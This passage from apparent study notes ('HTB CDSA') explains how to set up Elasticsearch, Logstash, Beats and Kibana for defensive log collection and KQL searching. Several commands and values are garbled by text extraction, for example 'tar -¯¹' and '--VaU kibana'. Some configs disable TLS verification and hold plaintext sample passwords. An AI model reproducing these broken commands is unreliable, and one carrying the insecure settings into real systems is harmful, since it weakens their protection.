     roles to users.
     Setting IP and Port for Elastic Search
     When you open   elasticsearch.yml , you need to
     change   network.host and http.port to your
     desired settings. If you are running Elastic Search
     locally you can then use       127.0.0.1   and a port of
     your choice.
Verifying Installation
Hit the Elasticsearch endpoint on port 9200 to confirm it is
running.
On a shell, run the following:
 curl localhost:9200
 curl localhost:9200/_cluster/health
A sample healthy output:
 {
 "cluster_name":"elasticsearch",
 "status":"green",
 "timed_out":false,
 "number_of_nodes":1,
 "number_of_data_nodes":1,
 "active_primary_shards":0,
 "active_shards":0,
 "relocating_shards":0,
 "initializing_shards":0,
                             471 / 547
                            HTB CDSA
 "unassigned_shards":0,
 "delayed_unassigned_shards":0,
 "number_of_pending_tasks":0,
 "number_of_in_flight_fetch":0,
 "task_max_waiting_in_queue_millis":0,
 "active_shards_percent_as_number":100.0
 }
Executing Search Queries in Elastic Search
This section is especially useful for data analysts,
developers and site reliability engineers as it explains
running search queries on datasets.
First make sure you have followed the steps above to
understand how to create an index, mappings and run
basic queries to retrieve data.
Executing queries
Assuming that you have created an index and added data,
you can now start executing search queries.
For full references on supported search queries, check the
below link:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/query-dsl.html
Example query: retrieving cars with BMW model
Below we search the dataset stored in    cars   index and
use  term to search fields in the dataset. The field name
is car_model and we are looking for values matching
 BMW
                            472 / 547
                             HTB CDSA
 GET cars/_search
 {
         "query": {
             "term": {
                 "car_model": { "value": "BMW"
 }
         }
     }
 }
A more complex version of this search may include
searching for cars whose model is not     BMW   and their
color is   red
Belo we used     bool   because we want to match two
compound queries (model and color).
must   and   must not    clauses are used to exclude values
matching    BMW and to   include values matching   Red
 GET cars/_search
 {
     "query": {
         "bool": {
             "must_not": [
                 { "term": {
                     "car_model": { "value":
 "BMW"}
                 }
             ],
             "must": [
                              473 / 547
                                HTB CDSA
                        { "term": {
                            "car_color": { "value":
 "Red" }
                            }
                        }
                    ]
           }
      }
 }
Lets say if we can extract all information about cars that
have a specific feature such as biometric features.
Below we perform a full search looking for the string
biometric      in   specifi_feature         field and return any
matches.
 GET cars/_search
 {
     "query": {
         "match": {
             "specific_feature":{
                 "query": "biometric"
             }
     }
 }
You can also restrict the results to a given data range,
check below:
                                474 / 547
                             HTB CDSA
     "query": {
         "range": {
             "ótimestamp": {
                 "gte": "2023-01-
 23T00:00:00.000Z",
                 "lt": "2024-01-
 24T00:00:00.000Z"
                     }
                 }
             }
Remember to check the reference URL below for more use
cases and supported queries
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/query-dsl.html
Understanding Aggregations
Aggregations allow you to summarize large volumes of
data into something easier to consume. Elasticsearch can
perform two primary types of aggregations:
• Metric aggregations can calculate metrics such as
count, sum, min, max, and average on numeric data.
• Bucket aggregations can be used to organize large
datasets into groups, depending on the value of a field.
Buckets can be created based on.
Full list of aggregations can be found below:
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/search-aggregations.html
                             475 / 547
                             HTB CDSA
Ingesting Logs
Log ingestion is the process of adding data and logs from
various sources (Windows, Linux, MacOS, Network
devices,etc) to elastic search and Kibana for processing
and analysis.
With Elastic Agent
Elastic Agent is a single, unified way to add monitoring
for logs, metrics, and other types of data to a host.
It's recommended to install the agent on workstations
that you wish to monitor directly.
Tip
I personally prefer using elastic agent deployment rather
than using beats or logstash for log and data collection
simply because it reduces the administrative overhead of
deploying, managing, and upgrading multiple agents across
your environment.
Understanding Fleets
Fleet is a component that's used to manage Elastic Agent
configurations across your
environment.
Fleet is made up of two components:
•   Fleet UI   is a Kibana application with a user interface
for users to onboard and configure agents, manage the
onboarded data, and administer agents across your
environment.
•   Fleet Server   is a backend component that Elastic
Agents from across your environment can connect to, to
retrieve agent policies, updates, and management
commands.
Understanding Agent Policy
                             476 / 547
                             HTB CDSA
An agent policy is a YAML file that defines the various
inputs and settings that an agent will collect and ship to
Elasticsearch (or other supported destination). When
you're using Elastic Agent in standalone mode, the policy
can be configured using the
/etc/elasticagent/elastic-agent.yml           file. When an
agent is managed by Fleet, the policy is retrieved from
Elasticsearch and automatically applied to the agent when
it starts up.
The Fleet interface on Kibana can be used to create and
manage agent policies. Once a policy has been created,
users can add integrations that define the data sources to
be collected by the agent.
Setting up Fleet server to manage agents
Before creating a fleet server, you need to enable security
components in your ELK setup.
Check out the link below for detailed instructions on
security components of ELK.
 https://www.elastic.co/guide/en/elasticsearch/
 reference/8.0/
 configuring-stack-security.html
Then follow below steps to create the fleet server:
     Log into Kibana as the elastic user and navigate to
     the Fleet app on Kibana, under the    Management
     section in the sidebar.
     Click on the   Agents   tab on the Fleet application. Go
     to the download page and download Elastic Agent for
     your operating system.
                             477 / 547
                            HTB CDSA
     On the Fleet application, click on Fleet settings on
     the top-right corner and do the following:
     Set the value for the Fleet Server host to
 https://<Your-Host-IP>:8220.
Fleet Server will listen on port 8220 when installed.
Set the value for Elasticsearch hosts to
 https://Your-Host-IP>:9200
Elasticsearch listens on port 9200 by default.
If you're using a self-signed certificate on your
Elasticsearch cluster, add the following line to the
Elasticsearch output configuration option. This disables
the verification of the SSL certificate but still encrypts
communication to Elasticsearch.
 ssl.verification_mode: none
Check below figure for reference:
                             478 / 547
                         HTB CDSA
   On Kibana, click Generate a service token to create
   an enrollment key for Fleet Server. This enrollment
   key will be used to authenticate the Fleet Server
   instance with Kibana upon enrollment. Once
   generated, Kibana should also display the command
   to use for Fleet Server installation and enrollment:
   Copy the installation command and execute it on the
   Fleet Server host inside the elastic-agent directory:
sudo ./elastic-agent install - --fleet-
serveres=
https://34.151.73.248:9200 --fleet-server-
servicetoken=<Your-Enrollment-Token>
                         479 / 547
                           HTB CDSA
After successful enrollment, you should see the fleet
available in Kibana
You can now enroll Elastic Agent to collect data from
across your environment and use Fleet Server to manage
your agents. You can also enroll multiple Fleet Server
instances to scale the number of agents you can manage
or increase availability for Fleet.
Creating an Elastic Agent using the fleet server
     Navigate to Fleet on Kibana and click on the Agents
     tab. Click on Add Agent to continue.
     Now on the machine you want to collect logs from,
     execute the below commands (assuming it's Linux
     machine) to install the agent:
 curl
 https://artifacts.elastic.co/downloads/beats/
 elastic-agent/elastic-agent-8.0.0-linux-
 x86_64.tar.gz --_| agent.tar.gz
 tar -¯¹ agent.tar.gz
                            480 / 547
                            HTB CDSA
      Copy the automatically generated command and
      execute it on the host running the sample application
      in the elastic-agent directory
 sudo ./elastic-agent install - --I=ht
 tps://34.151.73.248:8220 --enrollment-token=
 <Your-Enrollment-Token>
Once finished, you should see the host in Kibana
TIP
You will need to add the --insecure flag at the end of your
enrollment command if you are using a self-signed
certificate on Elastic Agent. This will verify the hostname
on the certificate and encrypt communications to Fleet
Server but skip establishing trust with the certificate
authority being used.
Creating an Elastic Agent using integrations
Follow the steps below to create an elastic agent:
      Log in to Kibana
      Go to Add integrations, search for system and
      select Add System
      Add a name and description that fits the scenario.
                            481 / 547
                           HTB CDSA
     Make sure that Collect logs from System
     instances and Collect metrics from System
     instances are turned on.
     Make sure to add the paths to the logs you wish to
     monitor depending on the endpoint. An example is
     shown below
     When it’s done, you’ll have an agent policy that
     contains a system integration policy for the
     configuration you just specified.
     In the popup, click Add Elastic Agent to your
     hosts to open the Add agent flyout then choose
     enroll in fleet
     Download, install, and enroll the Elastic Agent on
     your host by selecting your host operating system
     and following the Install Elastic Agent on your
     host step.
An example figure is shown below:
                           482 / 547
                     HTB CDSA
To confirm successful enrollment of the agent,
click View assets to access dashboards related to
the System integration.
Choose a dashboard that is related to the operating
system of your monitored system.
Lastly, Open the [Metrics System] Host
overview dashboard to view performance metrics
from your host system.
                      483 / 547
                           HTB CDSA
If you wish to add more log paths such as Nginx logs,
Apache logs, etc just repeat the above steps by adding
new integration and search by the product name such as
Nginx, specify the path to Nginx logs on your endpoint and
under Where to add this integration, select Existing
hosts, then select the agent policy you created earlier.
That way, you can deploy the change to the agent that’s
already running.
With Log Stash
Logstash is a data processing engine used to take the
data from different sources, apply the filter on it or
normalize it, and then send it to the destination which
could be Kibana or a listening port. A logstash
configuration file is divided into three parts, as shown
below.
Log stach is the equivalent of an indexer in
Splunk
The input part is where the user defines the source from
which the data is being ingested. Logstash supports many
input plugins as shown in the
reference https://www.elastic.co/guide/en/logstash/8.1
/input-plugins.html
Example Input Plugins
 File:
 Reads data from files in real-time or as a
 batch. Useful for ingesting log files or other
 structured data stored on the local file
 system.
 TCP:
                            484 / 547
                            HTB CDSA
 Listens for incoming TCP connections and reads
 data from them. Useful for receiving data from
 network devices or other systems over TCP.
 HTTP:
 Acts as a web server and reads data
 from HTTP requests. Useful for receiving data
 from webhooks, REST APIs, or other HTTP-based
 sources.
The filter part is where the user specifies the filter
options to normalize the log ingested above. Logstash
supports many filter plugins as shown in the reference
documentation https://www.elastic.co/guide/en/logstash
/8.1/filter-plugins.html
Example Filter Plugins
 Grok:
 Parses unstructured log data using custom
 patterns and extracts structured fields from
 it.
 Date:
 Parses and manipulates dates and timestamps in
 event fields. Allows you to extract, format,
 or convert timestamps to a desired
 configuration.
The Output part is where the user wants the filtered data
to send. It can be a listening port, Kibana Interface,
elastic search database, a file, etc. Logstash supports
many Output plugins as shown in the reference
                            485 / 547
                            HTB CDSA
documentation https://www.elastic.co/guide/en/logstash
/8.1/output-plugins.html
Installing and Configuring Logstash
If you wish to follow the official instructions, click below
link or you can follow along with the instructions provided
in this guide.
 https://www.elastic.co/guide/en/logstash/curre
 nt/getting-started-with-logstash.html
Installation
After you download the package file, execute the below
command as root
 dpkg -i logstash.deb
You can then configure Log Stash to start when the
system starts
 systemctl    daemon-reload
 systemctl    enable logstash.service
 systemctl    start logstash.service
 systemctl    status logstash.service
Configuration
Log Stash Config Files
/etc/logstash     directory is the default location for
important configuration files which are:
                            486 / 547
                       HTB CDSA
logstash.yml :    This is the main configuration file
for Logstash. It contains global settings and options
for Logstash, such as network settings, logging
configurations, pipeline configuration paths, and
more.
jvm.options :    This file contains the Java Virtual
Machine (JVM) options for Logstash. You can use it
to configure parameters like memory allocation,
garbage collection settings, and other JVM-related
options.
log4j2.properties :        Logstash uses the Log4j2
framework for logging. This file allows you to
configure the logging behavior, including log levels,
log outputs (such as console or file), log file
locations, and more.
pipelines.yml :     If you are running multiple
pipelines in Logstash, this file is used to define and
configure them.
conf.d/ :   This directory is often used to store
individual pipeline configuration files. You can create
separate configuration files within this directory,
each defining a specific data processing
pipeline. Logstash will load and process these
configuration files in alphabetical order, so it’s
common to prefix them with numbers to control the
processing order.
patterns/ :   This directory stores custom patterns
that can be used in Logstash’s grok filter. Grok is a
powerful pattern-matching and extraction tool
in Logstash, and you can define your own patterns
in separate files within this directory.
                       487 / 547
                             HTB CDSA
     startup.options :    This file contains additional
     options and arguments that can be passed
     to Logstash during startup.
     Configuring auto reload
     Open thelogstash.yml and go to Pipeline
     Configuration Settings section where you              need
     to uncomment and the below values to the below
     variables:
   1. config.reload.automatic:         true
   2. config.reload.interval:        3s
      Then lastly execute below command,
 systemctl restart logstash.service
Creating sample pipeline to ingest log data from a TCP
Port on an Apache Server
When we want to create a custom data stream to ingest
data from a specific data source, we will have to create a
custom config file and place it under
/etc/logstash/conf.d/ .
Lets say we want to ingest data coming from TCP port
4545 on Apache server and the data is in JSON format then
using the referred documentation links above we can
create a custom file named     tcp.conf       with below
content:
 input
 {
     tcp    {
     port => 4545
       }
                             488 / 547
                            HTB CDSA
 }
 filter {
     json   {
     source => "message"
       }
 }
 output {
 elasticsearch {
     hosts => ["localhost:9200"]
     user => "elastic"
     password => "password"
     index => "Apache"
     pipeline => "Apache"
     }
 }
We started first with the   input        plugin and defined the
TCP port. Afterwards, we used the          filter   plugin to
define the format of the data source, in our case it's
JSON. In the JSON filter plugin, it required to define the
source   for which we used      message       as a value. Lastly
we used the   output   plugin to tell logstash to send the
ingested logs to Elastic Search which is running on the
local host port 9200 and we named the index as          json
Lastly you can run Logstash with the above config file:
 /usr/share/bin/logstash - apache-logs-
 logstash.conf < apache.log
                             489 / 547
                         HTB CDSA
Configuring logstash to ingest logs from a csv file and
send the output into another csv file
 input {
     file {
     path => "/home/Desktop/web_attacks.csv"
     start_position => "beginning"
     sincedb_path => "/dev/null"
     }
 }
 filter {
     csv {
     separator => ","
     columns => ["timestamp", "ip_address",
 "request", "referrer", "user_agent",
 "attack_type"]
     }
 }
 output {
     file {
     path => /home/Desktop/updated-web-
 attacks.csv
     }
 }
 input {
   file {
     path => "/var/log/auth.log"
     start_position => "beginning"
                          490 / 547
                           HTB CDSA
         sincedb_path => "/dev/null"
     }
 }
 filter {
   if [message] =~
 /^(\w{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2})/
   {
     # E¯ac + 0U aU| _U + I_! V°
     date {
       match => [ "message", "MMM d HH:mm:ss",
 "MMM dd HH:mm:ss" ]
       target => "@timestamp"
     }
   }
 }
 output {
   file {
     path =>
 "/root/home/Desktop/logstash_output.log"
   }
 }
With Beats
All beats are located under the directory   /etc/
directory.
For example, when you install the filebeat, it will be
stored at   /etc/filebeat/ .
                            491 / 547
                            HTB CDSA
Bear in mind that you can install modules to the beats
which extend your log collection functionality so that you
can collect logs from many sources.
These modules, lets say modules for filebeat, are created
and located under   /etc/filebeat/module.d/
Types of Beats
• Filebeat: Collecting log data.
• Metricbeat: Collecting metric data.
• Packetbeat: Decoding and collecting network packets.
• Heartbeat: Collecting system/service uptime and latency
data.
• Auditbeat: Collecting OS audit data.
• Winlogbeat: Collecting Windows event, application, and
security logs.
• Functionbeat: Running data collection on serverless
compute infrastructure such as AWS Lambda
Installation and Configuration
Definition
Beats is a set of different data shipping agents used to
collect data from multiple agents. Like Winlogbeat is used
to collect windows event logs, Packetbeat collects
network traffic flows.
Beats is the equivalent of a forwarder in
Splunk
Beats is also a host-based agent known as Data-shippers
that is used to ship/transfer data from the endpoints to
elasticsearch.
Each beat is a single-purpose agent that sends specific
data to the elasticsearch.
Installation
                            492 / 547
                           HTB CDSA
Follow along the link below that contains the instructions
to install beats
 https://www.elastic.co/guide/en/beats/libbeat/
 current/getting-started.html
Configuration
Depending on the beat that you have installed from the link
above, you may proceed and create/edit the configuration
file and add the log source.
Example: Ingesting Nginx Logs
    1. Install Filebeat on the Nginx server host.
    2. The Filebeat agent can be configured from the
        filebeat.yml file located in
       the /etc/filebeat/ directory on Linux
       installations or in the config/ directory    on tar
       archives.
       For example, below is a sample of    filebeat.yml
       config file that ingests logs from Nginx webserver:
 filebeat.config.modules:
 # Glob pattern for configuration loading
 path: /etc/filebeat/modules.d/nginx.yml
 filebeat.inputs:
 type: log
   paths:
 /path/to/your/logfile.log
 output.elasticsearch:
                            493 / 547
                        HTB CDSA
  hosts: ["http://localhost:9000"]
  protocol: "http"
  username: "filebeat_internal"
  password: "YOUR_PASSWORD"
  index: "filebeat"
 3. Nginx modules can be found at
     /etc/filebeat/modules.d/nginx.yml        and
    below is an example config file:
- module: nginx
  access:
    enabled: 
    var.paths:
["/path/to/log/nginx/access.log*"]
  error:
    enabled: 
    var.paths:
["/path/to/log/nginx/error.log*"]
 4. Lastly enable the Nginx module:
filebeat modules enable nginx
 5. Load the necessary nginx module artifacts into
    Elasticsearch and Kibana to ingest and visualize the
    data. This step needs to be done once per
    Elasticsearch deployment (or whenever a new
    module is activated). Run the following command
    to run the setup process (replacing localhost with
    your Kibana endpoint):
                        494 / 547
                          HTB CDSA
 filebeat setup -E
 "setup.kibana.host=localhost:9000" --modules
 nginx --dashboards --pipelines
   6. After saving the file, run the service:
 systemctl start filebeat
 # OR
 sudo service filebeat start
   7. Confirm the logs are visible on the Discover app in
      Kibana. You can visit the web page on your web
      server to generate traffic and corresponding log
      events to validate your ingestion pipeline.
Example: Monitoring Nginx Health Metrics
   1. Edit the /etc/nginx/sites-enabled/default file and
      add the following code block to the file:
 server {
     server_name 127.0.0.1;
     location /server-status {
         stub_status;
         allow 127.0.0.1;
         deny all;
     }
 }
   2. Restart Nginx server:
                           495 / 547
                         HTB CDSA
systemctl restart nginx
 3. Install the Metricbeat agent on the host running the
    workload to be monitored. Check below link for
    instructions:
https://www.elastic.co/guide/en/beats/metricbe
at/current/metricbeat-installation-
configuration.html
 4. Open   metricbeat.yml            and Set up Metricbeat to
    load configuration modules from the
     /etc/metricbeat/ modules.d/               directory so that
    final config file looks like the one below:
metricbeat.config.modules:
# Glob pattern for configuration loading
    path: ${path.config}/modules.d/*.°UI
output.elasticsearch:
# Array of hosts to connect to.
    hosts: ["localhost:9200"]
# Protocol - either ëhttpë (default) or
ëhttpsë.
#protocol: "https"
    username: "elastic"
    password: "password"
processors:
                         496 / 547
                        HTB CDSA
   - add_host_metadata: ̰
   - add_cloud_metadata: ̰
 5. Enable the nginx module to collect metrics from the
    web server
metricbeat modules enable nginx
 6. Edit the
     /etc/metricbeat/modules.d/nginx.yml         (check
    the previous example of collecting nginx logs) file
    to include the following parameters:
- module: nginx
metricsets:
- stubstatus
period: 10s
# Nginx metrics API
hosts: ["http://127.0.0.1"]
 7. Enable the system module to collect metrics from
    the host operating system.
metricbeat modules enable system
 8. Edit the
     /etc/metricbeat/modules.d/system.yml         file to
    include the required metric sets
- module: system
period: 10s
                         497 / 547
                          HTB CDSA
metricsets:
    - cpu
    - load
    - memory
    - network
- module: system
period: 1m
metricsets:
    - filesystem
    - fsstat
    - module: system
period: 15m
metricsets:
    - uptime
  9. Run the Metricbeat setup command to load the
     necessary artifacts, such as index templates and
     dashboards, into your Elasticsearch deployment:
metricbeat setup -E
"setup.kibana.host=localhost:9200"
 10. Start the Metricbeat systemd service to start
     collecting metrics
systemctl start metricbeat
 11. The Metrics app in Kibana can also be used to
     visualize infrastructure and system metrics from
     across your environment:
                          498 / 547
                            HTB CDSA
Also check The [Metricbeat Nginx] Overview and The
[Metricbeat System] Overview dashboards:
Example: Ingesting OS logs
Auditbeat leverages the Linux audit framework (auditd) to
consistently and reliably collect audit/security-relevant
data from hosts. The scope of data collection includes the
following:
• Linux kernel events related to unauthorized file access
and remote access.
• Changes on critical files and file paths.
                            499 / 547
                           HTB CDSA
• Packages, processes, sockets, and user activity on the
system.
To start, complete the below steps:
   1. Install Auditbeat on the web server host by
      checking the below link:
 https://www.elastic.co/guide/en/beats/auditbea
 t/current/auditbeat-installation-
 configuration.html
   2. Edit theauditbeat.yml file located in
       /etc/auditbeat and, as shown in the       sample
      below, we configure auditbeat to detect the use of
      32-bit APIs on a 64-bit host OS, indicating a
      potential attack vector for compromise, monitor
      changes to users and groups, watch for changes to
      files in the following critical directories on the host
      and can indicate when binaries and config files are
      changed and collects information regarding
      successful/failed logs, processes, socket events,
      and user/host information:
 - module: auditd
   audit_rules: |
         -a always,exit -F arch=b32 -S all -F
 key=32bit-abi
         -a always,exit -F arch=b64 -S
 execve,execveat -k exec
         -a always,exit -F arch=b64 -S
 accept,bind,connect -F key=external-access
                            500 / 547
                     HTB CDSA
       -w /etc/group -p wa -k identity
       -w /etc/passwd -p wa -k identity
       -w /etc/gshadow -p wa -k identity
- module: file_integrity
  paths:
  - /bin
  - /usr/bin
  - /sbin
  - /usr/sbin
  - /etc
- module: system
  datasets:
    - host # General host information, e.g.
uptime,IPs
    - login # User logins, logouts, and system
boots.
    - process # Started and stopped processes
    - socket # Opened and closed sockets
    - user # User information
   state.period: 12h
output.elasticsearch:
    # Array of hosts to connect to.
    hosts: ["localhost:9200"]
    # Protocol - either ëhttpë (default) or
ëhttpsë.
    #protocol: "https"
                     501 / 547
                           HTB CDSA
      username: "elastic"
      password: "changeme"
   3. Set up Auditbeat artifacts on Elasticsearch and
      Kibana by running the setup command:
 auditbeat setup -E
 "setup.kibana.host=localhost:9200"
   4. Start the Auditbeat service to initiate the collection
      of audit events:
 systemctl start auditbeat
After a few moments, audit data should be available on
Kibana for you to explore and visualize.
Example: Collecting Network Traffic Using Packetbeat
     Install Packetbeat on the desired location
 https://www.elastic.co/guide/en/beats/packetbe
 at/current/packetbeat-installation-
 configuration.html
     On the endpoint where you installed packetbeat,
               /etc/packetbeat/
     navigate to                         and open
     packetbeat.yml
     Set up the network interfaces for Packetbeat to
     monitor. You can use a label (such as eth0) to
     specify an interface or use the any parameter to
     monitor all available interfaces:
                            502 / 547
                         HTB CDSA
packetbeat.interfaces.device: any
   Configure the collection of network flow information.
   The flow in your config file should look similar to the
   one below:
packetbeat.flows:
# Set network flow timeout. Flow is killed if
no packet is received before being
# timed out.
timeout: 30s
# Configure reporting period. If set to -1,
only killed flows will be reported
period: 10s
   Configure the protocols and ports that Packetbeat
   should collect and decode from the data being
   sniffed. A sample is shown below:
packetbeat.protocols:
- type: icmp
enabled: 
- type: dhcpv4
ports: [67, 68]
- type: dns
ports: [53]
- type: http
ports: [80]
                          503 / 547
                         HTB CDSA
   Send the data to the Elasticsearch cluster for
   indexing:
output.elasticsearch:
# Array of hosts to connect to.
hosts: ["localhost:9200"]
# Protocol - either ëhttpë (default) or
ëhttpsë.
#protocol: "https"
username: "elastic"
password: "pass"
   You could also apply data enrichment as below:
processors:
- add_cloud_metadata: ̰
- detect_mime_type:
field: http.request.body.content
target: http.request.mime_type
- detect_mime_type:
field: http.response.body.content
target: http.response.mime_type
   Set up the required Packetbeat artifacts on
   Elasticsearch and Kibana
packetbeat setup -E
"setup.kibana.host=localhost:5601"
                         504 / 547
                           HTB CDSA
     Start collecting data by starting the Packetbeat
     systemctl service
 systemctl start packetbeat
Data should be available on Discover to explore and
visualize as expected.
Beats Vs Logstash: Which one to use for
log collection and ingestion?
When to use Beats
• When you need to collect data from a large number of
hosts or systems from across your environment. Some
examples are as follows:
(a) Collecting web logs from a dynamic group of hundreds
of web servers.
(b) Collecting logs from a large number of microservices
running on a container orchestration platform such as
Kubernetes.
(c) Collecting metrics from a group of MySQL instances in
cloud/on-premises locations.
• When there is a supported Beats module available.
• When you do not need to perform a significant amount of
transformation/ processing before consuming data on
Elasticsearch.
• When consuming from a web source, you do not need to
have scaling/throughput concerns in place for a single
beat instance.
When to use Logstash
• When a large amount of data is consumed from a
centralized location (such as a file share, AWS S3, Kafka,
                           505 / 547
                           HTB CDSA
and AWS Kinesis) and you need to be able to scale
ingestion throughput.
• When you need to transform data considerably or parse
complex schemas/codecs, especially using regular
expressions or Grok.
• When you need to be able to load balance ingestion
across multiple Logstash instances.
• When a supported Beats module is not available.
Example Ingesting Fortinet Firewall
Logs
To configure a network firewall such as Fortinet to send
logs to your elastic search, first you would need to
configure your Fortinet firewall to send the logs to ELK
server by enabling the syslog format. Refer to the below
page about sending firewall logs in syslog format:
 https://docs.fortinet.com/document/fortigate/6
 .0.0/cli-reference/260508/log-syslogd-
 syslogd2-syslogd3-syslogd4-setting
Next you can choose to send the logs either through
Logstash by creating a udp/tcp listener or by using the
Fortinet module in Elastic search.
More about elastic search modules can be found below:
 https://www.elastic.co/guide/en/beats/filebeat
 /current/filebeat-modules-overview.html
Lets say we choose to collect logs through the integration
module so first thing to do is to create the configuration
                            506 / 547
                            HTB CDSA
file at   /etc/filebeat/module.d/fortinet.yml        with
below sample code:
 - module: fortinet
   firewall:
     enabled: 
     var.input: udp
     var.syslog_host: 0.0.0.0
     var.syslog_port: 9004
If you wish to use more variables in the code, take a look
at the below documentation:
 https://www.elastic.co/guide/en/beats/filebeat
 /current/filebeat-module-fortinet.html
Kibana
Kibana is a web-based data visualization that works with
elasticsearch to analyze, investigate and visualize the
data stream in real-time. It allows the users to create
multiple visualizations and dashboards for better visibility.
For data and SOC analysts, Kibana is used mainly
to search, analyze and visualize date
Installing and Configuring Kibana
Installation
If you installed Elastic search using docker then execute
below commands to start Kibana and connect it with the
docker container:
                            507 / 547
                             HTB CDSA
 docker pull
 docker.elastic.co/kibana/kibana:8.13.4
 docker run --VaU kibana --V  elastic -|
 5601:5601
 docker.elastic.co/kibana/kibana:8.13.4
Then using the provided URL, navigate to Kibana using your
browser and use the enrollment token that you copied
earlier, to connect your Kibana instance with
Elasticsearch.
To login to Kibana, use the username and password that
were generated during the elastic search installation
above.
You can then configure Kibana to start when the system
starts:
 systemctl      daemon-reload
 systemctl      enable kibana.service
 systemctl      start kibana.service
 systemctl      status kibana.service
Configuration
Kibana Config Files
The   /etc/kibana     path typically contains the
configuration files for Kibana:
      kibana.yml :    This is the main configuration file for
      Kibana. It contains various settings to customize
      Kibana’s behavior, such as the Elasticsearch server
                             508 / 547
                            HTB CDSA
   URL, server host and port, logging options, security
   configurations, and more. A sample config file for
   Kibana is shown below:
# Port for Kibana webserver to listen on
server.port: 5601
# Address/interface for Kibana to bind to.
server.host: 0.0.0.0
# List of Elasticsearch nodes for Kibana to
connect to.
# In a multi node setup, include more than 1
node here (ideally
a data node)
elasticsearch.hosts:
["http://elasticsearch1.host:9200",
"http://elasticsearch2.host:9200"]
# Credentials for Kibana to connect to
Elasticsearch if
security is setup
elasticsearch.username: "kibana_system"
elasticsearch.password: "kibana_password"
   kibana.keystore :        This file securely stores
   sensitive configuration settings, such as passwords
   and API keys. The       kibana.keystore        file provides
   a safer alternative to storing sensitive information in
   plain text within the    kibana.yml       file. It is
   encrypted and can be managed using
   the   bin/kibana-keystore            command-line tool.
   Configuring server IP and Port
                            509 / 547
                           HTB CDSA
     Open    kibana.yml and go to
     the    System: Kibana Server section          and make
     changes to the below variables as shown below:
     server.port: 5601      => Kibana runs on port 5601
     by default.
     server.host: "0.0.0.0"            => This is important to
     note that; if the server IP is changed, it should be
     updated here.
Then lastly we restart
 systemctl restart kibana.service
If somehow Kibana asks for a verification code when you
try to load it up in the browser, run the below command
to get a verification code
 /usr/share/kibana/bin/kibana-verification-code
Kibana Components
     Discover tab
     Visualization
     Dashboard
Discover Tab
Below is the Discover tab and its compnents numbered and
explained
                           510 / 547
                        HTB CDSA
1. Logs (document): Each log here is also known as
   a single document containing information about the
   event. It shows the fields and values found in that
   document.
2. Fields pane: Left panel of the interface shows the
   list of the fields parsed from the logs. We can
   click on any field to add the field to the filter or
   remove it from the search.
3. Index Pattern: Let the user select the index
   pattern from the available list.
4. Search bar: A place where the user adds search
   queries / applies filters to narrow down the
   results.
5. Time Filter: We can narrow down results based on
   the time duration. This tab has many options to
   select from to filter/limit the logs.
6. Time Interval: This chart shows the event counts
   over time.
7. TOP Bar: This bar contains various options to save
   the search, open the saved searches, share or
   save the search, etc.
                         511 / 547
                           HTB CDSA
Fields
The left panel of the Kibana interface shows the list of the
normalized fields it finds in the available documents/logs.
Click on any field, and it will show the top 5 values and
the percentage of the occurrence.
Tables
By default, the documents are shown in raw form. We can
click on any document and select important fields to
create a table showing only those fields. This method
reduces the noise and makes it more presentable and
                            512 / 547
                           HTB CDSA
meaningful.
KQL (Kibana Query Language)
It is a search query language used to search the ingested
logs/documents in the elasticsearch. Apart from the KQL
language, Kibana also supports Lucene Query Language.
We can disable the KQL query as shown below.
KQL is similar to splunk seach processing language as in
concepts of how it works and its objectives.
Reserved Characters in KQL
Reserved characters
in ELK include   + , - , = , && , || , & , |     and   !.
                           513 / 547
                                  HTB CDSA
For instance, using the       +    character in a query will result
in an error; to escape this character, precede it with a
backslash (e.g.       \+ ).
WildCards in KQL
Wildcards are another concept that can be used to filter
data in ELK. Wildcards match specific characters within a
field value. For example, using the           *   wildcard will
match any number of characters, while using
the    ?    wildcard will match a single character.
Searching The Logs with KQL
Free text Search
Free text search allows users to search for the logs based
on the text-only. That means a simple search of the
term       security   will return all the documents that
contain this term, irrespective of the field.
WILD CARD
KQL allows the wild card      *      to match parts of the
term/word. Let's find out how to use this wild card in
the search query.
Example Search Query:         United*
We have used the wildcard with the term United to return
all the results containing the term United and any other
term. If we had logs with the term            United Nations It
would also have returned those as a result of this
wildcard.
Logical Operators (AND | OR | NOT)
KQL also allows users to utilize the logical operators in the
search query. Let us see the examples below.
1- OR Operator
                                  514 / 547
                             HTB CDSA
We will use the OR operator to show logs that contain
either the United States or England.
Search Query:
 "United States" OR "England"
2- AND Operator
Here, we will use AND Operator to create a search that
will return the logs that contain the terms "UNITED
STATES" AND "Virginia."
Example Search Query:
 "United States" AND "Virginia"
3- NOT Operator
Similarly, we can use NOT Operator to remove the
particular term from the search results. This search query
will show the logs from the United States, including all
states but ignoring Florida.
Example Search Query:
 "United States" AND NOT ("Florida")
Field-based search
In the Field-based search, we will provide the field name
and the value we are looking for in the logs. This search
has a special syntax as    FIELD : VALUE .   It uses a
colon   :   as a separator between the field and the value.
Let's look at a few examples.
Example Search Query
                             515 / 547
                           HTB CDSA
 Source_ip : 238.163.231.224 AND UserName :
 Suleman
Explanation: We are telling Kibana to display all the
documents in which the field     Source_ip contains the
value    ËÓ˪ËËÌ˪ËÓÊ˪ÏÎ   and    UserName as Suleman as
shown below.
Explanation: We are telling Kibana to display all the
documents in which the field     Source_ip contains the
value    ËÓ˪ËËÌ˪ËÓÊ˪ÏÎ   and    UserName as Suleman as
shown below.
Searching With Range Queries
Range queries allow us to search for documents with field
values within a specified range.
Operators such as   greater than > or less than <         are
used in range queries to extract data within a specific
range.
Example query: search all data where
response_time_seconds       field is greater than or equal
to 100
 response_time_seconds >= 100
Another example:
Below query returns how many Data Leak events which
have a severity level of 9 and up
 severity_level >= 9 AND incident_type : Data
 Leak
                            516 / 547
                                HTB CDSA
Another example: In below query, we extract how many
events before 10/30/2023 where the system was either an
email or web server and the username was AJohnston
 @timestamp<"2023-10-30" AND
 affected_systems.system_type : email, web AND
 team_members.name : AJohnston
Data Visualization
The visualization tab allows us to visualize the data in
different forms like Table, Pie charts, Bar charts, etc.
This visualization task will use multiple options this tab
provides to create some simple presentable visualizations.
               †1RWHV &DWDORJ H &\ EHU 6HFXULW\ 6 WXG\
 1RWHV &HUWLI LFDWLRQV &\ EHUVHFXULW\ +7% &’ 6 $ NLEDQD      J LI ‡ FRXOG
                            QRWEH I RXQG
Dashboards
Dashboards provide good visibility on the logs collection. A
